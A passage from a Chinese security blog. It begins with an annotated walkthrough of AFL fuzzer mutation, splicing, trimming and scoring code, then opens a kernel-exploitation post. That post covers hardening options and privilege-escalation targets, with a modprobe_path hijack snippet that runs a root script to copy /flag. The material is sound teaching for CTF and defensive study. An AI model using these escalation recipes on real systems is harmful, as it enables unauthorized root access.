MAX_DET_EXTRAS) || extras[j].len &gt; len - i || !memcmp(extras[j].data, out_buf + i, extras[j].len) || !memchr(eff_map + EFF_APOS(i), 1, EFF_SPAN_ALEN(i, extras[j].len))) &#123; stage_max--; continue; &#125; last_len = extras[j].len; memcpy(out_buf + i, extras[j].data, last_len); if (common_fuzz_stuff(argv, out_buf, len)) goto abandon_entry; stage_cur++; &#125; /* Restore all the clobbered memory. */ memcpy(out_buf + i, in_buf + i, last_len);&#125;new_hit_cnt = queued_paths + unique_crashes;stage_finds[STAGE_EXTRAS_UO] += new_hit_cnt - orig_hit_cnt;stage_cycles[STAGE_EXTRAS_UO] += stage_max; 或者插入extras 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253new_hit_cnt = queued_paths + unique_crashes;stage_finds[STAGE_EXTRAS_UO] += new_hit_cnt - orig_hit_cnt;stage_cycles[STAGE_EXTRAS_UO] += stage_max;/* Insertion of user-supplied extras. */stage_name = &quot;user extras (insert)&quot;;stage_short = &quot;ext_UI&quot;;stage_cur = 0;stage_max = extras_cnt * (len + 1);orig_hit_cnt = new_hit_cnt;ex_tmp = ck_alloc(len + MAX_DICT_FILE);for (i = 0; i &lt;= len; i++) &#123; stage_cur_byte = i; for (j = 0; j &lt; extras_cnt; j++) &#123; if (len + extras[j].len &gt; MAX_FILE) &#123; stage_max--; continue; &#125; /* Insert token */ memcpy(ex_tmp + i, extras[j].data, extras[j].len); /* Copy tail */ memcpy(ex_tmp + i + extras[j].len, out_buf + i, len - i); if (common_fuzz_stuff(argv, ex_tmp, len + extras[j].len)) &#123; ck_free(ex_tmp); goto abandon_entry; &#125; stage_cur++; &#125; /* Copy head */ ex_tmp[i] = out_buf[i];&#125;ck_free(ex_tmp);new_hit_cnt = queued_paths + unique_crashes;stage_finds[STAGE_EXTRAS_UI] += new_hit_cnt - orig_hit_cnt;stage_cycles[STAGE_EXTRAS_UI] += stage_max; 最后尝试之前变异阶段得到的extras: 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748if (!a_extras_cnt) goto skip_extras;stage_name = &quot;auto extras (over)&quot;;stage_short = &quot;ext_AO&quot;;stage_cur = 0;stage_max = MIN(a_extras_cnt, USE_AUTO_EXTRAS) * len;stage_val_type = STAGE_VAL_NONE;orig_hit_cnt = new_hit_cnt;for (i = 0; i &lt; len; i++) &#123; u32 last_len = 0; stage_cur_byte = i; for (j = 0; j &lt; MIN(a_extras_cnt, USE_AUTO_EXTRAS); j++) &#123; /* See the comment in the earlier code; extras are sorted by size. */ if (a_extras[j].len &gt; len - i || !memcmp(a_extras[j].data, out_buf + i, a_extras[j].len) || !memchr(eff_map + EFF_APOS(i), 1, EFF_SPAN_ALEN(i, a_extras[j].len))) &#123; stage_max--; continue; &#125; last_len = a_extras[j].len; memcpy(out_buf + i, a_extras[j].data, last_len); if (common_fuzz_stuff(argv, out_buf, len)) goto abandon_entry; stage_cur++; &#125; /* Restore all the clobbered memory. */ memcpy(out_buf + i, in_buf + i, last_len);&#125;new_hit_cnt = queued_paths + unique_crashes;stage_finds[STAGE_EXTRAS_AO] += new_hit_cnt - orig_hit_cnt;stage_cycles[STAGE_EXTRAS_AO] += stage_max; Havoc Stage havoc是不确定的大变异 首先，由于splice阶段也会进行havoc，所以要进行区分此时是直接运行的havoc还是splice阶段运行的 1234567891011121314151617181920212223242526272829303132stage_cur_byte = -1;/* The havoc stage mutation code is also invoked when splicing files; if the splice_cycle variable is set, generate different descriptions and such. */if (!splice_cycle) &#123; stage_name = &quot;havoc&quot;; stage_short = &quot;havoc&quot;; stage_max = (doing_det ? HAVOC_CYCLES_INIT : HAVOC_CYCLES) * perf_score / havoc_div / 100;&#125; else &#123; static u8 tmp[32]; perf_score = orig_perf; sprintf(tmp, &quot;splice %u&quot;, splice_cycle); stage_name = tmp; stage_short = &quot;splice&quot;; stage_max = SPLICE_HAVOC * perf_score / havoc_div / 100;&#125;if (stage_max &lt; HAVOC_MIN) stage_max = HAVOC_MIN;temp_len = len;orig_hit_cnt = queued_paths + unique_crashes;havoc_queued = queued_paths; 接下来是一系列变异循环： 首先，这里有两个循环，外层循环控制测试运行次数，内层循环控制变异个数 在内层循环中，通过随机数来选择一种变异策略，策略包括翻转、加减、随机插入等等 在经过n次随机变异后，再通过common_fuzz_stuff 运行测试 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405for (stage_cur = 0; stage_cur &lt; stage_max; stage_cur++) &#123; u32 use_stacking = 1 &lt;&lt; (1 + UR(HAVOC_STACK_POW2)); stage_cur_val = use_stacking; for (i = 0; i &lt; use_stacking; i++) &#123; switch (UR(15 + ((extras_cnt + a_extras_cnt) ? 2 : 0))) &#123; case 0: /* Flip a single bit somewhere. Spooky! */ FLIP_BIT(out_buf, UR(temp_len &lt;&lt; 3)); break; case 1: /* Set byte to interesting value. */ out_buf[UR(temp_len)] = interesting_8[UR(sizeof(interesting_8))]; break; case 2: /* Set word to interesting value, randomly choosing endian. */ if (temp_len &lt; 2) break; if (UR(2)) &#123; *(u16*)(out_buf + UR(temp_len - 1)) = interesting_16[UR(sizeof(interesting_16) &gt;&gt; 1)]; &#125; else &#123; *(u16*)(out_buf + UR(temp_len - 1)) = SWAP16( interesting_16[UR(sizeof(interesting_16) &gt;&gt; 1)]); &#125; break; case 3: /* Set dword to interesting value, randomly choosing endian. */ if (temp_len &lt; 4) break; if (UR(2)) &#123; *(u32*)(out_buf + UR(temp_len - 3)) = interesting_32[UR(sizeof(interesting_32) &gt;&gt; 2)]; &#125; else &#123; *(u32*)(out_buf + UR(temp_len - 3)) = SWAP32( interesting_32[UR(sizeof(interesting_32) &gt;&gt; 2)]); &#125; break; case 4: /* Randomly subtract from byte. */ out_buf[UR(temp_len)] -= 1 + UR(ARITH_MAX); break; case 5: /* Randomly add to byte. */ out_buf[UR(temp_len)] += 1 + UR(ARITH_MAX); break; case 6: /* Randomly subtract from word, random endian. */ if (temp_len &lt; 2) break; if (UR(2)) &#123; u32 pos = UR(temp_len - 1); *(u16*)(out_buf + pos) -= 1 + UR(ARITH_MAX); &#125; else &#123; u32 pos = UR(temp_len - 1); u16 num = 1 + UR(ARITH_MAX); *(u16*)(out_buf + pos) = SWAP16(SWAP16(*(u16*)(out_buf + pos)) - num); &#125; break; case 7: /* Randomly add to word, random endian. */ if (temp_len &lt; 2) break; if (UR(2)) &#123; u32 pos = UR(temp_len - 1); *(u16*)(out_buf + pos) += 1 + UR(ARITH_MAX); &#125; else &#123; u32 pos = UR(temp_len - 1); u16 num = 1 + UR(ARITH_MAX); *(u16*)(out_buf + pos) = SWAP16(SWAP16(*(u16*)(out_buf + pos)) + num); &#125; break; case 8: /* Randomly subtract from dword, random endian. */ if (temp_len &lt; 4) break; if (UR(2)) &#123; u32 pos = UR(temp_len - 3); *(u32*)(out_buf + pos) -= 1 + UR(ARITH_MAX); &#125; else &#123; u32 pos = UR(temp_len - 3); u32 num = 1 + UR(ARITH_MAX); *(u32*)(out_buf + pos) = SWAP32(SWAP32(*(u32*)(out_buf + pos)) - num); &#125; break; case 9: /* Randomly add to dword, random endian. */ if (temp_len &lt; 4) break; if (UR(2)) &#123; u32 pos = UR(temp_len - 3); *(u32*)(out_buf + pos) += 1 + UR(ARITH_MAX); &#125; else &#123; u32 pos = UR(temp_len - 3); u32 num = 1 + UR(ARITH_MAX); *(u32*)(out_buf + pos) = SWAP32(SWAP32(*(u32*)(out_buf + pos)) + num); &#125; break; case 10: /* Just set a random byte to a random value. Because, why not. We use XOR with 1-255 to eliminate the possibility of a no-op. */ out_buf[UR(temp_len)] ^= 1 + UR(255); break; case 11 ... 12: &#123; /* Delete bytes. We&#x27;re making this a bit more likely than insertion (the next option) in hopes of keeping files reasonably small. */ u32 del_from, del_len; if (temp_len &lt; 2) break; /* Don&#x27;t delete too much. */ del_len = choose_block_len(temp_len - 1); del_from = UR(temp_len - del_len + 1); memmove(out_buf + del_from, out_buf + del_from + del_len, temp_len - del_from - del_len); temp_len -= del_len; break; &#125; case 13: if (temp_len + HAVOC_BLK_XL &lt; MAX_FILE) &#123; /* Clone bytes (75%) or insert a block of constant bytes (25%). */ u8 actually_clone = UR(4); u32 clone_from, clone_to, clone_len; u8* new_buf; if (actually_clone) &#123; clone_len = choose_block_len(temp_len); clone_from = UR(temp_len - clone_len + 1); &#125; else &#123; clone_len = choose_block_len(HAVOC_BLK_XL); clone_from = 0; &#125; clone_to = UR(temp_len); new_buf = ck_alloc_nozero(temp_len + clone_len); /* Head */ memcpy(new_buf, out_buf, clone_to); /* Inserted part */ if (actually_clone) memcpy(new_buf + clone_to, out_buf + clone_from, clone_len); else memset(new_buf + clone_to, UR(2) ? UR(256) : out_buf[UR(temp_len)], clone_len); /* Tail */ memcpy(new_buf + clone_to + clone_len, out_buf + clone_to, temp_len - clone_to); ck_free(out_buf); out_buf = new_buf; temp_len += clone_len; &#125; break; case 14: &#123; /* Overwrite bytes with a randomly selected chunk (75%) or fixed bytes (25%). */ u32 copy_from, copy_to, copy_len; if (temp_len &lt; 2) break; copy_len = choose_block_len(temp_len - 1); copy_from = UR(temp_len - copy_len + 1); copy_to = UR(temp_len - copy_len + 1); if (UR(4)) &#123; if (copy_from != copy_to) memmove(out_buf + copy_to, out_buf + copy_from, copy_len); &#125; else memset(out_buf + copy_to, UR(2) ? UR(256) : out_buf[UR(temp_len)], copy_len); break; &#125; /* Values 15 and 16 can be selected only if there are any extras present in the dictionaries. */ case 15: &#123; /* Overwrite bytes with an extra. */ if (!extras_cnt || (a_extras_cnt &amp;&amp; UR(2))) &#123; /* No user-specified extras or odds in our favor. Let&#x27;s use an auto-detected one. */ u32 use_extra = UR(a_extras_cnt); u32 extra_len = a_extras[use_extra].len; u32 insert_at; if (extra_len &gt; temp_len) break; insert_at = UR(temp_len - extra_len + 1); memcpy(out_buf + insert_at, a_extras[use_extra].data, extra_len); &#125; else &#123; /* No auto extras or odds in our favor. Use the dictionary. */ u32 use_extra = UR(extras_cnt); u32 extra_len = extras[use_extra].len; u32 insert_at; if (extra_len &gt; temp_len) break; insert_at = UR(temp_len - extra_len + 1); memcpy(out_buf + insert_at, extras[use_extra].data, extra_len); &#125; break; &#125; case 16: &#123; u32 use_extra, extra_len, insert_at = UR(temp_len + 1); u8* new_buf; /* Insert an extra. Do the same dice-rolling stuff as for the previous case. */ if (!extras_cnt || (a_extras_cnt &amp;&amp; UR(2))) &#123; use_extra = UR(a_extras_cnt); extra_len = a_extras[use_extra].len; if (temp_len + extra_len &gt;= MAX_FILE) break; new_buf = ck_alloc_nozero(temp_len + extra_len); /* Head */ memcpy(new_buf, out_buf, insert_at); /* Inserted part */ memcpy(new_buf + insert_at, a_extras[use_extra].data, extra_len); &#125; else &#123; use_extra = UR(extras_cnt); extra_len = extras[use_extra].len; if (temp_len + extra_len &gt;= MAX_FILE) break; new_buf = ck_alloc_nozero(temp_len + extra_len); /* Head */ memcpy(new_buf, out_buf, insert_at); /* Inserted part */ memcpy(new_buf + insert_at, extras[use_extra].data, extra_len); &#125; /* Tail */ memcpy(new_buf + insert_at + extra_len, out_buf + insert_at, temp_len - insert_at); ck_free(out_buf); out_buf = new_buf; temp_len += extra_len; break; &#125; &#125; &#125; if (common_fuzz_stuff(argv, out_buf, temp_len)) goto abandon_entry; /* out_buf might have been mangled a bit, so let&#x27;s restore it to its original size and shape. */ if (temp_len &lt; len) out_buf = ck_realloc(out_buf, len); temp_len = len; memcpy(out_buf, in_buf, len); /* If we&#x27;re finding new stuff, let&#x27;s run for a bit longer, limits permitting. */ if (queued_paths != havoc_queued) &#123; if (perf_score &lt;= HAVOC_MAX_MULT * 100) &#123; stage_max *= 2; perf_score *= 2; &#125; havoc_queued = queued_paths; &#125;&#125; Splice Stage 这一部分是铰接阶段，用来将几个testcase的不同部分拼接在一起，并在之后通过havoc阶段进行变异 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879 if (use_splicing &amp;&amp; splice_cycle++ &lt; SPLICE_CYCLES &amp;&amp; queued_paths &gt; 1 &amp;&amp; queue_cur-&gt;len &gt; 1) &#123; struct queue_entry* target; u32 tid, split_at; u8* new_buf; s32 f_diff, l_diff; /* First of all, if we&#x27;ve modified in_buf for havoc, let&#x27;s clean that up... */ if (in_buf != orig_in) &#123; ck_free(in_buf); in_buf = orig_in; len = queue_cur-&gt;len; &#125; // 首先为了havoc清理in_buf /* Pick a random queue entry and seek to it. Don&#x27;t splice with yourself. */ do &#123; tid = UR(queued_paths); &#125; while (tid == current_entry); // 选择一个随机queue内实例 splicing_with = tid; target = queue; while (tid &gt;= 100) &#123; target = target-&gt;next_100; tid -= 100; &#125; while (tid--) target = target-&gt;next; /* Make sure that the target has a reasonable length. */ while (target &amp;&amp; (target-&gt;len &lt; 2 || target == queue_cur)) &#123; target = target-&gt;next; splicing_with++; &#125; // 对长度的检查 if (!target) goto retry_splicing;// 如果直到遍历到最后都没有找到适合长度的，就重试 /* Read the testcase into a new buffer. */ fd = open(target-&gt;fname, O_RDONLY); if (fd &lt; 0) PFATAL(&quot;Unable to open &#x27;%s&#x27;&quot;, target-&gt;fname); new_buf = ck_alloc_nozero(target-&gt;len); ck_read(fd, new_buf, target-&gt;len, target-&gt;fname); close(fd); /* Find a suitable splicing location, somewhere between the first and the last differing byte. Bail out if the difference is just a single byte or so. */ locate_diffs(in_buf, new_buf, MIN(len, target-&gt;len), &amp;f_diff, &amp;l_diff); // 找到适合的拼接位置， // 首先找到第一个和最后一个不同的byte之间，并且避免只是单byte的不同 if (f_diff &lt; 0 || l_diff &lt; 2 || f_diff == l_diff) &#123; ck_free(new_buf); goto retry_splicing; &#125; /* Split somewhere between the first and last differing byte. */ // 然后在这个区间随机选择一个位置来进行拼接 split_at = f_diff + UR(l_diff - f_diff); /* Do the thing. */ len = target-&gt;len; memcpy(new_buf, in_buf, split_at); in_buf = new_buf; ck_free(out_buf); out_buf = ck_alloc_nozero(len); memcpy(out_buf, in_buf, len); goto havoc_stage; // 最后通过havoc阶段进行变异 &#125; 在之后再一次运行到此时由于不再满足此if判断，于是结束循环 12if (use_splicing &amp;&amp; splice_cycle++ &lt; SPLICE_CYCLES &amp;&amp; queued_paths &gt; 1 &amp;&amp; queue_cur-&gt;len &gt; 1) 最终清理资源，并结束fuzz_one的运行 1234567891011121314151617181920212223 ret_val = 0;abandon_entry: splicing_with = -1; /* Update pending_not_fuzzed count if we made it through the calibration cycle and have not seen this entry before. */ if (!stop_soon &amp;&amp; !queue_cur-&gt;cal_failed &amp;&amp; !queue_cur-&gt;was_fuzzed) &#123; queue_cur-&gt;was_fuzzed = 1; pending_not_fuzzed--; if (queue_cur-&gt;favored) pending_favored--; &#125; munmap(orig_in, queue_cur-&gt;len); if (in_buf != orig_in) ck_free(in_buf); ck_free(out_buf); ck_free(eff_map); return ret_val; trim_case | 对于testcase的修剪 trim_case以2的幂次位置为单位进行裁剪, 每次修减后通过run_target 运行, 测试结果是否与原来相同。 最后如果发生了修剪，再更新bitmap_score 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125static u8 trim_case(char **argv, struct queue_entry *q, u8 *in_buf)&#123; static u8 tmp[64]; static u8 clean_trace[MAP_SIZE]; u8 needs_write = 0, fault = 0; u32 trim_exec = 0; u32 remove_len; u32 len_p2; /* Although the trimmer will be less useful when variable behavior is detected, it will still work to some extent, so we don&#x27;t check for this. */ if (q-&gt;len &lt; 5) return 0; stage_name = tmp; bytes_trim_in += q-&gt;len; /* Select initial chunk len, starting with large steps. */ len_p2 = next_p2(q-&gt;len); // 以2的幂次向上取整 remove_len = MAX(len_p2 / TRIM_START_STEPS, TRIM_MIN_BYTES); /* Continue until the number of steps gets too high or the stepover gets too small. */ while (remove_len &gt;= MAX(len_p2 / TRIM_END_STEPS, TRIM_MIN_BYTES)) &#123; u32 remove_pos = remove_len; sprintf(tmp, &quot;trim %s/%s&quot;, DI(remove_len), DI(remove_len)); stage_cur = 0; stage_max = q-&gt;len / remove_len; while (remove_pos &lt; q-&gt;len) &#123; u32 trim_avail = MIN(remove_len, q-&gt;len - remove_pos); u32 cksum; write_with_gap(in_buf, q-&gt;len, remove_pos, trim_avail); // 将修剪后的输入写入outfile fault = run_target(argv, exec_tmout); // 运行fuzz trim_execs++; if (stop_soon || fault == FAULT_ERROR) goto abort_trimming; /* Note that we don&#x27;t keep track of crashes or hangs here; maybe TODO? */ cksum = hash32(trace_bits, MAP_SIZE, HASH_CONST); /* If the deletion had no impact on the trace, make it permanent. This isn&#x27;t perfect for variable-path inputs, but we&#x27;re just making a best-effort pass, so it&#x27;s not a big deal if we end up with false negatives every now and then. */ if (cksum == q-&gt;exec_cksum) &#123; // 检查运行时bitmap是否与原来相等 u32 move_tail = q-&gt;len - remove_pos - trim_avail; q-&gt;len -= trim_avail; len_p2 = next_p2(q-&gt;len); memmove(in_buf + remove_pos, in_buf + remove_pos + trim_avail, move_tail); // 如果是，则更新testcase的len以及内存中的testcase /* Let&#x27;s save a clean trace, which will be needed by update_bitmap_score once we&#x27;re done with the trimming stuff. */ if (!needs_write) &#123; // 如果之前没有设置need_write，设置此标志 needs_write = 1; memcpy(clean_trace, trace_bits, MAP_SIZE); // 保存trace_bits &#125; &#125; else remove_pos += remove_len; /* Since this can be slow, update the screen every now and then. */ if (!(trim_exec++ % stats_update_freq)) show_stats(); stage_cur++; &#125; remove_len &gt;&gt;= 1; &#125; /* If we have made changes to in_buf, we also need to update the on-disk version of the test case. */ if (needs_write) &#123; // 如果发生了修剪，需要同步到磁盘里保存的testcase, 并且更新bitmap_score s32 fd; unlink(q-&gt;fname); /* ignore errors */ fd = open(q-&gt;fname, O_WRONLY | O_CREAT | O_EXCL, 0600); if (fd &lt; 0) PFATAL(&quot;Unable to create &#x27;%s&#x27;&quot;, q-&gt;fname); ck_write(fd, in_buf, q-&gt;len, q-&gt;fname); close(fd); memcpy(trace_bits, clean_trace, MAP_SIZE); update_bitmap_score(q); &#125;abort_trimming: bytes_trim_out += q-&gt;len; return fault;&#125; calculate_score | 对于testcase分数的计算 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889static u32 calculate_score(struct queue_entry *q)&#123; u32 avg_exec_us = total_cal_us / total_cal_cycles; u32 avg_bitmap_size = total_bitmap_size / total_bitmap_entries; u32 perf_score = 100; /* Adjust score based on execution speed of this path, compared to the global average. Multiplier ranges from 0.1x to 3x. Fast inputs are less expensive to fuzz, so we&#x27;re giving them more air time. */ if (q-&gt;exec_us * 0.1 &gt; avg_exec_us) perf_score = 10; else if (q-&gt;exec_us * 0.25 &gt; avg_exec_us) perf_score = 25; else if (q-&gt;exec_us * 0.5 &gt; avg_exec_us) perf_score = 50; else if (q-&gt;exec_us * 0.75 &gt; avg_exec_us) perf_score = 75; else if (q-&gt;exec_us * 4 &lt; avg_exec_us) perf_score = 300; else if (q-&gt;exec_us * 3 &lt; avg_exec_us) perf_score = 200; else if (q-&gt;exec_us * 2 &lt; avg_exec_us) perf_score = 150; /* Adjust score based on bitmap size. The working theory is that better coverage translates to better targets. Multiplier from 0.25x to 3x. */ if (q-&gt;bitmap_size * 0.3 &gt; avg_bitmap_size) perf_score *= 3; else if (q-&gt;bitmap_size * 0.5 &gt; avg_bitmap_size) perf_score *= 2; else if (q-&gt;bitmap_size * 0.75 &gt; avg_bitmap_size) perf_score *= 1.5; else if (q-&gt;bitmap_size * 3 &lt; avg_bitmap_size) perf_score *= 0.25; else if (q-&gt;bitmap_size * 2 &lt; avg_bitmap_size) perf_score *= 0.5; else if (q-&gt;bitmap_size * 1.5 &lt; avg_bitmap_size) perf_score *= 0.75; /* Adjust score based on handicap. Handicap is proportional to how late in the game we learned about this path. Latecomers are allowed to run for a bit longer until they catch up with the rest. */ if (q-&gt;handicap &gt;= 4) &#123; perf_score *= 4; q-&gt;handicap -= 4; &#125; else if (q-&gt;handicap) &#123; perf_score *= 2; q-&gt;handicap--; &#125; /* Final adjustment based on input depth, under the assumption that fuzzing deeper test cases is more likely to reveal stuff that can&#x27;t be discovered with traditional fuzzers. */ switch (q-&gt;depth) &#123; case 0 ... 3: break; case 4 ... 7: perf_score *= 2; break; case 8 ... 13: perf_score *= 3; break; case 14 ... 25: perf_score *= 4; break; default: perf_score *= 5; &#125; /* Make sure that we don&#x27;t go over limit. */ if (perf_score &gt; HAVOC_MAX_MULT * 100) perf_score = HAVOC_MAX_MULT * 100; return perf_score;&#125; common_fuzz_stuff | 一个testcase的运行 在fuzz过程中，用来通知fork_server运行一次测试，并且保存有效的种子 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455EXP_ST u8 common_fuzz_stuff(char **argv, u8 *out_buf, u32 len)&#123; u8 fault; if (post_handler) &#123; out_buf = post_handler(out_buf, &amp;len); // 此handler通常是afl_processers if (!out_buf || !len) return 0; &#125; write_to_testcase(out_buf, len); // 保存此testcase fault = run_target(argv, exec_tmout); // 运行一次测试 // 返回1说明需要快速终止 if (stop_soon) return 1; if (fault == FAULT_TMOUT) &#123; if (subseq_tmouts++ &gt; TMOUT_LIMIT) &#123; cur_skipped_paths++; return 1; &#125; &#125; else subseq_tmouts = 0; /* Users can hit us with SIGUSR1 to request the current input to be abandoned. */ if (skip_requested) &#123; skip_requested = 0; cur_skipped_paths++; return 1; &#125; /* This handles FAULT_ERROR for us: */ queued_discovered += save_if_interesting(argv, out_buf, len, fault); // 如果存在interesting 的种子，保存起来 if (!(stage_cur % stats_update_freq) || stage_cur + 1 == stage_max) show_stats(); return 0;&#125;","categories":[{"name":"Fuzz","slug":"Fuzz","permalink":"https://v3rdant.cn/categories/Fuzz/"}],"tags":[{"name":"Fuzz","slug":"Fuzz","permalink":"https://v3rdant.cn/tags/Fuzz/"},{"name":"Coding","slug":"Coding","permalink":"https://v3rdant.cn/tags/Coding/"}]},{"title":"Pwn.Linux-Kernel-Pwn-All-in-One","slug":"Pwn.Linux-Kernel-Pwn-All-in-One","date":"2024-01-11T08:10:33.000Z","updated":"2024-03-05T01:58:38.032Z","comments":true,"path":"Pwn.Linux-Kernel-Pwn-All-in-One/","link":"","permalink":"https://v3rdant.cn/Pwn.Linux-Kernel-Pwn-All-in-One/","excerpt":"","text":"overview 笔者厌倦了用户态堆的种种tricks，于是决定进入kernel pwn的大坑😊 安全机制 CONFIG_CFI_CLANG 控制流完整性校验，限制ROP CONFIG_SLAB_FREELIST_HARDENED 类似于用户态下 glibc 中的 safe-linking 机制，在内核中的 slab/slub 分配器当中也存在着类似的机制保护着 freelist—— SLAB_FREELIST_HARDENED： 类似于 glibc 2.32 版本引入的保护，在开启这种保护之前，slub 中的 free object 的 next 指针直接存放着 next free object 的地址，攻击者可以通过读取 freelist 泄露出内核线性映射区的地址，在开启了该保护之后 free object 的 next 指针存放的是由以下三个值进行异或操作后的值： 当前 free object 的地址 下一个 free object 的地址 由 kmem_cache 指定的一个 random 值 CONFIG_HARDENED_USERCOPY hardened usercopy 是用以在用户空间与内核空间之间拷贝数据时进行越界检查的一种防护机制，主要检查拷贝过程中对内核空间中数据的读写是否会越界： 读取的数据长度是否超出源 object 范围 写入的数据长度是否超出目的 object 范围 不过这种保护 不适用于内核空间内的数据拷贝 ，这也是目前主流的绕过手段 这一保护被用于 copy_to_user() 与 copy_from_user() 等数据交换 API 中 CONFIG_SLAB_FREELIST_RANDOM 这种保护主要发生在 slub allocator 向 buddy system 申请到页框之后的处理过程中，对于未开启这种保护的一张完整的 slub，其上的 object 的连接顺序是线性连续的，但在开启了这种保护之后其上的 object 之间的连接顺序是随机的，这让攻击者无法直接预测下一个分配的 object 的地址 需要注意的是这种保护发生在slub allocator 刚从 buddy system 拿到新 slub 的时候，运行时 freelist 的构成仍遵循 LIFO CONFIG_INIT_ON_ALLOC_DEFAULT_ON 当编译内核时开启了这个选项时，在内核进行“堆内存”分配时（包括 buddy system 和 slab allocator），会将被分配的内存上的内容进行清零，从而防止了利用未初始化内存进行数据泄露的情况 CONFIG_RANDOMIZE_KSTACK_OFFSET 决定内核栈是否存在随机偏移 CONFIG_MEMCG_KMEM 决定GFP_KERNEL 与 GFP_KERNEL_ACCOUNT 是否会从同样的 kmalloc-xx 中进行分配 CONFIG_CFI_CLANG 决定是否开启CFI(控制流完整性)， 限制了ROP CONFIG_STATIC_USERMODEHELPER 决定modprobe_path 是否可写 信息搜集 查看内核版本 1cat /proc/version 检查各种基础保护 启动脚本 pti=on smep,smap kaslr .config 检查分配方式 Target 以下部分来自 ctf-wiki, 笔者会添加一些自己的理解。 modify cred 内核pwn的大部分目标都是实现提权，而一个进程的权限是由其对应的cred结构体决定的，因此。 kernel通过task_struct 中的cred的指针来索引cred结构体， 更进一步地，通过cred的结构体来识别当前user，因此可以通过修改当前cred结构体或者task_struct的指针来达成提权的效果。 12345678910111213141516171819struct cred &#123; atomic_t usage;#ifdef CONFIG_DEBUG_CREDENTIALS atomic_t subscribers; /* number of processes subscribed */ void *put_addr; unsigned magic;#define CRED_MAGIC 0x43736564#define CRED_MAGIC_DEAD 0x44656144#endif kuid_t uid; /* real UID of the task */ kgid_t gid; /* real GID of the task */ kuid_t suid; /* saved UID of the task */ kgid_t sgid; /* saved GID of the task */ kuid_t euid; /* effective UID of the task */ kgid_t egid; /* effective GID of the task */ kuid_t fsuid; /* UID for VFS ops */ kgid_t fsgid; /* GID for VFS ops */ ...&#125; 直接定位cred 当拥有内存读写的能力后，可以通过在内存中搜索magic 来查找cred结构体。 // 笔者尝试搜索后，发现不知道为什么，有些cred结构体，magic字段为空 #TODO 笔者给出另一个cred定位方法，在内核态下， GS 段 存储着进程相关控制信息，在其固定偏移，可以找到当前cred结构体的指针。 当然，显然大部分情况，是基本不可能找到恰好访问gs目标偏移地址的gadget的，因此这个方法并不是非常实用。 commit_creds commit_creds() 函数被用以将一个新的 cred 设为当前进程 task_struct 的 real_cred 与 cred 字段，因此若是我们能够劫持内核执行流调用该函数并传入一个具有 root 权限的 cred，则能直接完成对当前进程的提权工作 // 笔者目前还没有看过commit_creds()的源代码，并不清楚对cred有哪些检查 // 在笔者看来，如果没有限制 传入的creds必须是相应 slab_account 的话，其实可以自己找一块内存区域来写 prepare_kernel_cred() 在内核当中提供了 prepare_kernel_cred() 函数用以拷贝指定进程的 cred 结构体，当我们传入的参数为 NULL 时，该函数会拷贝 init_cred 并返回一个有着 root 权限的 cred： 123456789101112131415struct cred *prepare_kernel_cred(struct task_struct *daemon)&#123; const struct cred *old; struct cred *new; new = kmem_cache_alloc(cred_jar, GFP_KERNEL); if (!new) return NULL; kdebug(&quot;prepare_kernel_cred() alloc %p&quot;, new); if (daemon) old = get_task_cred(daemon); else old = get_cred(&amp;init_cred); 我们不难想到的是若是我们可以在内核空间中调用 commit_creds(prepare_kernel_cred(NULL))，则也能直接完成提权的工作 不过自从内核版本 6.2 起，prepare_kernel_cred(NULL) 将不再拷贝 init_cred，而是将其视为一个运行时错误并返回 NULL，这使得这种提权方法无法再应用于 6.2 及更高版本的内核 init_cred 在内核初始化过程当中会以 root 权限启动 init 进程，其 cred 结构体为静态定义的 init_cred，由此不难想到的是我们可以通过 commit_creds(&amp;init_cred) 来完成提权的工作 // 一个问题是，在高版本，init_cred本身不再作为一个符号导出，因此你直接 // kallsyms-finder 是找不到相应地址的 // 一个直接的方法是，在相应版本linux源代码里面直接搜索符号引用 // 可以在内核代码段里面找到相应地址 // 这个方法不仅仅可以用于init_cred，一切内核data段的匿名结构体都可以通过这个方法查找， 除非内核在写的时候本身就没有直接访问 modprobe_path modprobe 是linux的一个用于执行不确定格式文件的一个机制，其会以root权限使用modprobe_path指向的解释器来实现相对应的程序，如果我们能够劫持相关的程序，就能以root权限执行一个程序，从而提权 获取 modprobe_path 的地址。 修改 modprobe_path 为指定的程序。 触发执行 call_modprobe，从而实现提权 。这里我们可以利用以下几种方式来触发 执行一个非法的可执行文件。非法的可执行文件需要满足相应的要求（参考 call_usermodehelper 部分的介绍）。 使用未知协议来触发。 12345678910111213// step 1. modify modprobe_path to the target value// step 2. create related filesystem(&quot;echo -ne &#x27;#!/bin/sh\\n/bin/cp /flag /home/pwn/flag\\n/bin/chmod 777 /home/pwn/flag\\ncat flag&#x27; &gt; /home/pwn/catflag.sh&quot;);system(&quot;chmod +x /home/pwn/catflag.sh&quot;);// step 3. trigger it using unknown executablesystem(&quot;echo -ne &#x27;\\\\xff\\\\xff\\\\xff\\\\xff&#x27; &gt; /home/pwn/dummy&quot;);system(&quot;chmod +x /home/pwn/dummy&quot;);system(&quot;/home/pwn/dummy&quot;);// step 3. trigger it using unknown protocolsocket(AF_INET,SOCK_STREAM,132); 在这个过程中，我们着重关注下如何定位 modprobe_path。 直接定位 由于 modprobe_path 的取值是确定的，所以我们可以直接扫描内存，寻找对应的字符串。这需要我们具有扫描内存的能力。 间接定位 考虑到 modprobe_path 相对于内核基地址的偏移是固定的，我们可以先获取到内核的基地址，然后根据相对偏移来得到 